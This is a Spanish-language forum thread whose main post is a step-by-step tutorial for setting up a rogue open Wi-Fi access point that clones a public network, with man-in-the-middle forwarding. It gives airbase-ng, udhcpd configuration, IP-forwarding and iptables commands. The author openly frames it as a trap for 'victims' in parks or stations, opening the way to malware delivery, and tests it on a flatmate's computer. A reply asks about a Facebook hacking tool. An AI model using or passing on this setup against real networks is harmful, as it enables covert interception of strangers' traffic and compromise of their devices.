El libre pensamiento para un internet libre

No estas registrado.  

#1 23-07-2015 21:28:51

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Tutorial "Honeypot" ¿Qué es un "bote de miel"?¿Cómo poner lo de pie?

El honeypot (bote de miel) : Rogue Ap transparente con MITM...

honeyspot.png

                     ...Una trampa letal

  Bajo este nombre inocente se esconde una técnica muy sencilla, casi grosera, pero extremadamente peligrosa.
Un honeypot es una combinación de dos técnicas:

  1. Un rogue AP (un punto de acceso "falso" o mejor dicho "malicioso" )

  2. y un "man in the middle" (o MITM - hombre de por medio - o sea colocarse entre el punto de acceso y el cliente)

  Concretamente le técnica consiste en conectarse con una interfaz de redes (cable o wifi) a una fuente Interent y crear un punto de acceso wifi abierto con otra interfaz wifi.
Atraemos así a victimas que se conectan en nuestro punto de acceso "falso" y pueden navegar en Internet normalmente.
  Lo que no saben es que, mientras navegan, absolutamente todo esta pasando por nuestro ordenador;
Estamos puesto en posición idónea (man in the middle) para todo tipo de acciones malvadas. (y no se trata solo de leer el trafico - cosa que se puede hacer esnifando los aires)
 
La gente sabe que no se debería conectar a redes publicas para hacer cosas que requieren cierto grado de privacidad ya que el trafico no esta cifrado.
Que sea en windows o android etc... sale una advertencia sobre la falta de cifrado del trafico en las redes "OPEN" cuando uno se conecta a una red abierta.
Además solemos leer por todos lados que "uno no debería conectarse a redes publicas para realizar operaciones dónde van a usar datos personales"
  Y uno va a pensar que si no va a realizar un pago al banco y que va a usar "sabiamente" la red publica -  solo para navegar un rato y mirar tonterías; sin entrar en sus mails u en otro sitio dónde usan contraseñas y tienen datos personales - ; uno puede pensar que "no hay problemas"

  Error.  Gran error.
Vamos a ver lo fácil que es hacer un honeypot usando una red publica.
Con la técnica del honeypot; un simple clic en una pagina cualquiera puede significar un virus, un troyano o un malware instalado en el sistema.
Y es muy difícil dar se cuenta de nada ya que se navega en toda normalidad.

Creando un Honeypot

  Antes de empezar, decir que voy a basarme principalmente  en la lección uno del "bloc note d'antares" para todo lo que sigue.
[Tuto] Rogue AP – Épisode 1 : Un hotspot transparent
  La única diferencia es que para realizar el honeypot voy a usar Kali linux en lugar de backtrack 5 y que la versión de aircrack-ng será la ultima con su interfaz "wlanXmon" en lugar de "monX".
Además de la interfaz wifi de mi portátil usare un adaptador wifi (USB).
No es necesario : podría conectarme por cable para tener Internet y usar la interfaz wifi para hacer un honeypot.
Pero es mas realista usando dos interfaces wifi: nos conectamos a una red abierta cualquiera y creamos un "clon" de esta red para atraer victimas

  Asi que nos vamos de pesca y encontramos un lugar publico (a la sombra , que hace calor) dónde captamos  una red wifi publica abierta (un parque, una estación... ) llamada "WiFi libre"
Con la interfaz interna nos vamos a conectar y con la interfaz USB vamos a hacer otra red llamada "WiFi libre"... pero será un honeypot. (y para que sea visible la llamaré "wifi libre falso"

Conectarse a la red publica

Nos conectamos a esta red llamada "WiFi libre" y comprobamos el rango de IP que usa (para usar otro en el honeypot)

honeyspot2.jpg

Rogue AP

Ahora nos toca crear la red "falsa" y lo vamos a hacer con airbase-ng de la suite aircrack-ng usando un adaptador USB.

* Primero tenemos que pasar el mode monitor. Con

sudo airmon-ng

sabemos que nombre tiene la interfaz que acabamos de conectar. En mi caso la interna que uso para conectarme es wlan0 y la USB es wlan1. Para activar el mode monitor en wlan4 hago

sudo airmon-ng start wlan1

y veo que tengo ahora una interfaz llamada wlan1mon con el mode monitor activado

* Uso esta interfaz para crear mi rogue AP con airbase-ng

sudo airbase-ng -c 1 -e 'WiFi libre falso' wlan1mon

¡Hecho! : honeyspot4.jpg

tenemos ahora una interfaz llamada "at0" que emite un PA llamdo "WiFi libre (falso)" en el canal 1

Servidor DHCP

Ahora que la red esta creada debemos crear un servicio dhcp para que las "victimas" obtengan una IP automáticamente y se puedan conectar fácilmente.
Para ello seguiremos los consejos del maestro antares_145 y vamos a usar udhcp en lugar de dhcp porque es más fácil de configurar.
Tenemos que instalarlo y lo hacemos con

sudo apt-get install udhcpd
kcdtv@kali:~$ sudo apt-get install udhcpd
[sudo] password for kcdtv: 
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes NUEVOS:
  udhcpd
0 actualizados, 1 se instalarán, 0 para eliminar y 64 no actualizados.
Necesito descargar 21,5 kB de archivos.
Se utilizarán 85,0 kB de espacio de disco adicional después de esta operación.
Des:1 http://http.kali.org/kali/ kali/main udhcpd amd64 1:1.20.0-7 [21,5 kB]
Descargados 21,5 kB en 0seg. (25,6 kB/s)
Seleccionando el paquete udhcpd previamente no seleccionado.
(Leyendo la base de datos ... 334488 ficheros o directorios instalados actualmente.)
Desempaquetando udhcpd (de .../udhcpd_1%3a1.20.0-7_amd64.deb) ...
Procesando disparadores para man-db ...
Configurando udhcpd (1:1.20.0-7) ...
update-rc.d: We have no instructions for the udhcpd init script.
update-rc.d: It looks like a non-network service, we enable it.
udhcpd: Disabled. Edit /etc/default/udhcpd to enable it.

¡Ojo!
Como podeís ver en ultima liña debemos modificar el fichero /etc/default/udhcpd
lo abrimos con el editor de texto nano

sudo nano  /etc/default/udhcpd

es así :

honeyspot5.jpg

Y simplemente ponemos una almohadilla para anotar la liña y dejarlo así :

honeyspot6.jpg

Ahora creamos el fichero de configuración que guardamos en tmp (para que se borre cuando reiniciamos)

# Numero máximo de clientes conectados
max_leases 10
# Primera dirección IP disponible
start 192.168.0.10
# Ultima dirección disponible
end 192.168.0.20
# La interfaz creada por airebase-ng
interface at0
# Dominio de los clientes, cualquiera iré bien
domain local
# Servidor DNS a usar (es el de google pero podemos elegir otro) 
option dns 8.8.8.8
# la mascara de redes
option subnet 255.255.255.0
# la puerta de enlace (será nuestra dirección en la red)
option router 192.168.0.1
# tiempo de atribucíon de IP. 7200 segundos es un valor estándar
lease 7200
# Aquí indicamos el fichero dónde se guardan el log de las mac 
# debemos crear lo antes de lanzar uhcdpd
lease_file /tmp/udhcpd.leases

Lo llamamos udhcpd.conf ( lo que nos da como ruta completa /tmp/udhcpd.conf)
Creamos el fichero de log de las mac así

touch /tmp/udhcpd.leases

Antes de lanzar el servidor debemos activar la interfaz creada por airbase-ng

sudo ifconfig at0 up

y definir el rango IP:

sudo ifconfig at0 192.168.0.1 netmask 255.255.255.0

Ya podemos lanzar el servidor :

sudo udhcpd /tmp/udhcpd.conf
Re-dirección de trafico y parámetros del corta-fuego

Para que la trampa sea perfecta debemos transferir el trafico de una interfaz a otra.
Es el ultimo paso y para ello debemos:

  1. activar la transferencia a nivel del núcleo

    sudo su && echo 1 > /proc/sys/net/ipv4/ip_forward
  2. Configurar el corta fuegos para que redirige el trafico hacía wlan0 (la interfaz conectada)

    iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

 
Voila. cool (gracias antares_145 wink )

Comprobando el honey spot

Pillo el ordenata de mi compañero de piso (si, se su contraseña tongue ) y lo inicio.
Y me conecto a la red "WiFi libre falso".
De paso veo que la advertencia en Windows no es muy "alarmista" algo como "sus datos podrían estar leídos" roll y nos aconsejan de configurar como red "publica".
¡Y ya esta! Estoy conectado con el ordenador victima y navegando sin problemas :

honeyspot7.jpg

fuente :

Desconectado

#2 28-07-2015 02:25:57

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 315

Re: Tutorial "Honeypot" ¿Qué es un "bote de miel"?¿Cómo poner lo de pie?

como te explicas amigo con la novia o mujer no tendras problemas lol:lol::lol: porque explicandose de esa manera
gracias por todas las clases amigo
ojala sigua mucho tiempo con estos pedazo de tutos bien explicados

Desconectado

#3 30-07-2015 16:54:24

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Tutorial "Honeypot" ¿Qué es un "bote de miel"?¿Cómo poner lo de pie?

como te explicas amigo con la novia o mujer no tendras problemas

Consigo así llevar cinco vidas paralelas con cinco mujeres diferentes; pero he de admitir que es algo agotador. big_smile
En un próximo capitulo veremos como hacer un honey spot con hostpad que es mas estable y potente que airbase-ng wink

Desconectado

#4 31-07-2015 02:51:28

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 315

Re: Tutorial "Honeypot" ¿Qué es un "bote de miel"?¿Cómo poner lo de pie?

no te creas los ahi que hasta que no se mueren o les pasa algo malo de verdad no se saben cuantos hijos tienen ;:D  son efectos colaterales de la doble vida
una pregunta no es mi intencion desviar el tema y no se si ira con la filosofia del foro  pero tampoco creo que deba abrir un post por una duda ¿sabes si sigue valiendo el fbht    ( facebook hack tool)  o se  han corregido vulnerabilidades?
salu2 y a la espera de las  buenas  nuevas clases amigo

Desconectado

#5 31-07-2015 14:14:20

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Tutorial "Honeypot" ¿Qué es un "bote de miel"?¿Cómo poner lo de pie?

pero tampoco creo que deba abrir un post por una duda

Si, es lo que tienes que hacer : Si tienes una pregunta que va sobre un tema diferente (y es el caso, aunque se entiende dónde quieres llegar), lo suyo es abrir un tema a parte para hacer la pregunta.
Un foro sirve para hacer preguntas así que no te cortes y no dudes en abrir un tema si tienes una pregunta. wink
No he probado ni conozco el "faceboock hacking tool" así que no te puedo decir nada; no se que propone. tongue

Desconectado

Temas similares

Tema Respuestas Vistas Ultimo mensaje
2 246 29-05-2023 15:25:52 por Patcher
Pegado:
521 340551 10-05-2023 18:24:28 por Betis-Jesus
Hospital clinic dump por wifiyeah  [ 1 2 ]
27 1264 09-05-2023 21:32:44 por kcdtv
Hacktivismo por CHARGER22
1 214 08-05-2023 19:53:26 por kcdtv
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 18 ]
447 66157 22-04-2023 15:31:13 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 19

Estadisticas de los foros

Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36